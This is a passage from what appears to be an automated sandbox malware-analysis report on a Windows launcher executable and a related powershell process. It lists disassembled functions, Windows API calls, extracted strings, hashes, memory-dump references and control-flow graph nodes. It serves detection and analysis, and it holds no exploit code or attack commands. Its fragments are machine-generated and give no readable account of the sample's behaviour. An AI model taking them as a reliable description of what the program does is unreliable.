                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: FindResourceWindow$LoadLockTextmemsetstrstr
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1871962372-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 1298e7c1909e02cac85a35fd553868d9f91c7302c22f4e1a6b2c68c72ce7dee5
                                                                                                                                                                                                                                                                                                                • Instruction ID: 5d52d5c0b459d14cb6f1974f7d56ade6fd7020e608e51b2663064d8790cfeea0
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1298e7c1909e02cac85a35fd553868d9f91c7302c22f4e1a6b2c68c72ce7dee5
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 282160B2A083019BE714AF6AD54129FFBE4EF84354F01C83FE98CD3691E67885548B86
                                                                                                                                                                                                                                                                                                                Function 00402EE0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • Runtime used:%s (%s-bit), xrefs: 00402FC4
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657, xrefs: 00402F90
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: fprintfstrcpy
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657$Runtime used:%s (%s-bit)
                                                                                                                                                                                                                                                                                                                • API String ID: 1458319006-3954875208
                                                                                                                                                                                                                                                                                                                • Opcode ID: 5561c27fd72a1e767c22225ba6b48e1c42a17190cfea799da6d8e7f1897e806e
                                                                                                                                                                                                                                                                                                                • Instruction ID: e570360796af71997f007bbec0ddf7bd71377d3d7eeb5d391251dbc393d587ea
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5561c27fd72a1e767c22225ba6b48e1c42a17190cfea799da6d8e7f1897e806e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA3139719093019BD715AF24864839FB6A1EB80748F01C87FE8887B3C6D7BD9C419B8A
                                                                                                                                                                                                                                                                                                                Function 00402EDE Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • Runtime used:%s (%s-bit), xrefs: 00402FC4
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657, xrefs: 00402F90
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: fprintfstrcpy
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657$Runtime used:%s (%s-bit)
                                                                                                                                                                                                                                                                                                                • API String ID: 1458319006-3954875208
                                                                                                                                                                                                                                                                                                                • Opcode ID: e34a0cca9953dcd10a531016e5b932c1cff74b83191ca0bd0e7937265830d13f
                                                                                                                                                                                                                                                                                                                • Instruction ID: 2e410cda6b073cc25c187766190d21a1da9afde98849d5476af63c368e3af956
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e34a0cca9953dcd10a531016e5b932c1cff74b83191ca0bd0e7937265830d13f
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 602181719043059BD7149F15C64439BB7A5EB80348F01C87EE8887B3C6C7BD9C519B89
                                                                                                                                                                                                                                                                                                                Function 00403700 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 00403717
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: FindResourceExA.KERNEL32 ref: 00403440
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: LoadResource.KERNEL32 ref: 0040345C
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: LockResource.KERNEL32 ref: 0040346B
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: fprintf.MSVCRT ref: 004034B3
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: atoi.MSVCRT ref: 004034C3
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: FindResourceExA.KERNEL32 ref: 004034FE
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: LoadResource.KERNEL32 ref: 0040351B
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: LockResource.KERNEL32 ref: 0040352A
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: fprintf.MSVCRT ref: 00403573
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: atoi.MSVCRT ref: 00403583
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: strcat.MSVCRT(?), ref: 0040361A
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: strlen.MSVCRT ref: 00403622
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: _itoa.MSVCRT ref: 00403639
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: strlen.MSVCRT ref: 00403641
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$FindLoadLockatoifprintfstrlen$GlobalMemoryStatus_itoastrcat
                                                                                                                                                                                                                                                                                                                • String ID: -Xms$-Xmx$@
                                                                                                                                                                                                                                                                                                                • API String ID: 2157757142-2676391021
                                                                                                                                                                                                                                                                                                                • Opcode ID: dff8b46c210c447c65d657b453adb865e188cc97235aba00eb8c1e73047c40b0
                                                                                                                                                                                                                                                                                                                • Instruction ID: 0838842f76f9e4a7ac68c74f3cf3971a36c87926e8153908363a189b489a0147
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dff8b46c210c447c65d657b453adb865e188cc97235aba00eb8c1e73047c40b0
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D01D7B09097099FC704DF69E18154EBBF1EF88304F10883EF489A7385D738D9449B46
                                                                                                                                                                                                                                                                                                                Function 00401AFC Relevance: 6.0, APIs: 4, Instructions: 26timewindowCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CodeEnumExitKillMessagePostProcessQuitTimerWindows
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 405088690-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 9d36f53bfc2b48dcf375a5f439baa85ef358b269035d827499970f5c7433ee0c
                                                                                                                                                                                                                                                                                                                • Instruction ID: 4530f2aae7447fe0df29e6f37fc7dc1219e95ab942fdeb78a325eac38ac8bd41
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d36f53bfc2b48dcf375a5f439baa85ef358b269035d827499970f5c7433ee0c
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87F05EB59093008BC300BF34DA052197AE0AB40348F018A3FE8C5A33D1D77C9558EB9B
                                                                                                                                                                                                                                                                                                                Function 00401B20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                                                                                                                                • String ID: Laun$ch4j
                                                                                                                                                                                                                                                                                                                • API String ID: 4139908857-52159806
                                                                                                                                                                                                                                                                                                                • Opcode ID: ba5704b0daeddb5bd746fd9b5eed543a5f99ab6f6a48090e1268a62a4232c58d
                                                                                                                                                                                                                                                                                                                • Instruction ID: 3efb9f204aa9b6cf598ae448a7fd9fa3256bf58a8a3bede9923b47c04f3ea8c0
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba5704b0daeddb5bd746fd9b5eed543a5f99ab6f6a48090e1268a62a4232c58d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30F01CB0A042058BD708EF3EEE053963AE2A784300F04C27ED409CB3B5EBB484618B8D
                                                                                                                                                                                                                                                                                                                Function 00402531 Relevance: 5.1, APIs: 4, Instructions: 51stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strlen$strchrstrncpy
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 4793283-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: c717c3167b26713e1d36be612c62a11c9a96452fabd6d96aff045e23f77e9a9b
                                                                                                                                                                                                                                                                                                                • Instruction ID: 1041cfa0432d9ad742072a7b848d71ebc1d8de872eff087a6a568f2cbe167894
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c717c3167b26713e1d36be612c62a11c9a96452fabd6d96aff045e23f77e9a9b
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E11D3B8D04728ABCB009F55C5841AEFBB1EF48310F1684AAE8547B381C779AA41CBC6

                                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                                Execution Coverage:7.6%
                                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                Total number of Nodes:3
                                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                                                                execution_graph 16499 8b36838 16500 8b3687b SetThreadToken 16499->16500 16501 8b368a9 16500->16501

                                                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                                                Function 04E9B4A8 Relevance: .3, Instructions: 262COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 282f69e64622e495d6c39ef7d74328ddd0da0295ce6836400b6933d38f778901
                                                                                                                                                                                                                                                                                                                • Instruction ID: a41784c9677d1955736eff2f084b2e50ae368d35d9d2823ec33d503b6e987463
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 282f69e64622e495d6c39ef7d74328ddd0da0295ce6836400b6933d38f778901
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14912070A006155FEB19DFB488115AEB7F2EFC4604B00C92DD55AAB384EF34AD06CBD6
                                                                                                                                                                                                                                                                                                                Function 04E9B4B8 Relevance: .3, Instructions: 252COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: b9cf2eee2df2f58ad65b807f32c90fbdfa6f862ee1f701908f2520e8901573b8
                                                                                                                                                                                                                                                                                                                • Instruction ID: 791fa7d8f2a46ced273f0b431068d41faea162d08d1d20f9a8ad04365e11f601
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9cf2eee2df2f58ad65b807f32c90fbdfa6f862ee1f701908f2520e8901573b8
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52913F70A006155FEB19EFB488115AEB6F2EFC4604B40C92DD55AAB384EF34BD06CBD6
                                                                                                                                                                                                                                                                                                                Function 079C23E0 Relevance: 21.2, Strings: 16, Instructions: 1207COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2253750907.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_79c0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: 4']q$4']q$pi"i$pi"i$pi"i$pi"i$pi"i$|,$i$J[j$J[j$J[j$J[j$J[j$J[j$rZj$rZj
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3220118955
                                                                                                                                                                                                                                                                                                                • Opcode ID: 5a2149103867fee055881dc553fe9a55e08288b85a3222bc12833ec12d1b902d
                                                                                                                                                                                                                                                                                                                • Instruction ID: c038f86d8d38fcfad7fe46fe18dc9adca049f67ec995789a67bfefd8f6aea640
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a2149103867fee055881dc553fe9a55e08288b85a3222bc12833ec12d1b902d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 792215B1B0030A8FCF20DF69C5406AABBEABF89315F14847EE509CB251DB35D945C7A2
                                                                                                                                                                                                                                                                                                                Function 08B36831 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50threadCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 194 8b36831-8b36873 195 8b3687b-8b368a7 SetThreadToken 194->195 196 8b368b0-8b368cd 195->196 197 8b368a9-8b368af 195->197 197->196
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2256804399.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_8b30000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: ThreadToken
                                                                                                                                                                                                                                                                                                                • String ID: q
                                                                                                                                                                                                                                                                                                                • API String ID: 3254676861-3452382182
                                                                                                                                                                                                                                                                                                                • Opcode ID: a6ec91be1ce26ecdf17334a8fd9f74ec47962f3c9703f0a00da4b81a14429092
                                                                                                                                                                                                                                                                                                                • Instruction ID: 118802861af12ab602b475d289102e935676d175ce457d07b9f4cf6902bb63f3
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6ec91be1ce26ecdf17334a8fd9f74ec47962f3c9703f0a00da4b81a14429092
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B1143B59002488FCB20CF9AD984BDEFBF4EB89320F24846AD458A7610C775A844CFA1
                                                                                                                                                                                                                                                                                                                Function 08B36838 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48threadCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 200 8b36838-8b368a7 SetThreadToken 202 8b368b0-8b368cd 200->202 203 8b368a9-8b368af 200->203 203->202
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2256804399.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_8b30000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: ThreadToken
                                                                                                                                                                                                                                                                                                                • String ID: q
                                                                                                                                                                                                                                                                                                                • API String ID: 3254676861-3452382182
                                                                                                                                                                                                                                                                                                                • Opcode ID: cec8485b631ecf2ba8e94077ea58f3a652afa9300a268ea58c7bab0ecfceeedb
                                                                                                                                                                                                                                                                                                                • Instruction ID: 90d7adc0c6db2404a97cb80e4b92edbc0c346d55c0f176e8011f682bd9842716
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cec8485b631ecf2ba8e94077ea58f3a652afa9300a268ea58c7bab0ecfceeedb
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B71133B59003188FDB10DF9AD984BDEFBF8EB49320F24846AD458A7310D779A944CFA5
                                                                                                                                                                                                                                                                                                                Function 04E9AFC0 Relevance: 2.6, Strings: 2, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 248 4e9afc0-4e9afc9 call 4e9a5ac 250 4e9afce-4e9afd2 248->250 251 4e9afe2-4e9b07d 250->251 252 4e9afd4-4e9afe1 250->252 258 4e9b07f-4e9b085 251->258 259 4e9b086-4e9b0a3 251->259 258->259
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: q$(&]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3105985135
                                                                                                                                                                                                                                                                                                                • Opcode ID: 44f9e3c270ea4bb8f109a17dfa94a0547854a3d692244add56721edd282b0ecd
                                                                                                                                                                                                                                                                                                                • Instruction ID: 4974318985ba939d2421ccffec3991566ef82549ccb48fbad7b5cf3a3a9566ca
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44f9e3c270ea4bb8f109a17dfa94a0547854a3d692244add56721edd282b0ecd
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D21BD75A002588FDB14DFAEE84469EBBF5EF88320F24842AD408E7340CB75A945CFE5
                                                                                                                                                                                                                                                                                                                Function 04E9BAE8 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 262 4e9bae8-4e9bb78 266 4e9bb7a 262->266 267 4e9bb7e-4e9bb89 262->267 266->267 268 4e9bb8b 267->268 269 4e9bb8e-4e9bbe8 call 4e9afc0 267->269 268->269 276 4e9bc39-4e9bc3d 269->276 277 4e9bbea-4e9bbef 269->277 279 4e9bc3f-4e9bc49 276->279 280 4e9bc4e 276->280 277->276 278 4e9bbf1-4e9bc14 277->278 282 4e9bc1a-4e9bc25 278->282 279->280 281 4e9bc53-4e9bc55 280->281 283 4e9bc7a-4e9bc7d call 4e9a5a0 281->283 284 4e9bc57-4e9bc78 281->284 285 4e9bc2e-4e9bc37 282->285 286 4e9bc27-4e9bc2d 282->286 288 4e9bc82-4e9bc86 283->288 284->288 285->281 286->285 291 4e9bc88-4e9bcb1 288->291 292 4e9bcbf-4e9bcee 288->292 291->292
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3452382182
                                                                                                                                                                                                                                                                                                                • Opcode ID: ba7de18616c12ab9b314a4eb3a11842a0508653e9fdc301351fe79bce9b6795d
                                                                                                                                                                                                                                                                                                                • Instruction ID: 49d5823deba809ee94f4a6ea0ca022d8f9c2379868e17859989d28e0939cf3fc
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba7de18616c12ab9b314a4eb3a11842a0508653e9fdc301351fe79bce9b6795d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA610471E00248DFDB14CFA9D584A9DBBF2FF88314F14816AE819AB364EB74AD45CB50
                                                                                                                                                                                                                                                                                                                Function 04E9BAD8 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

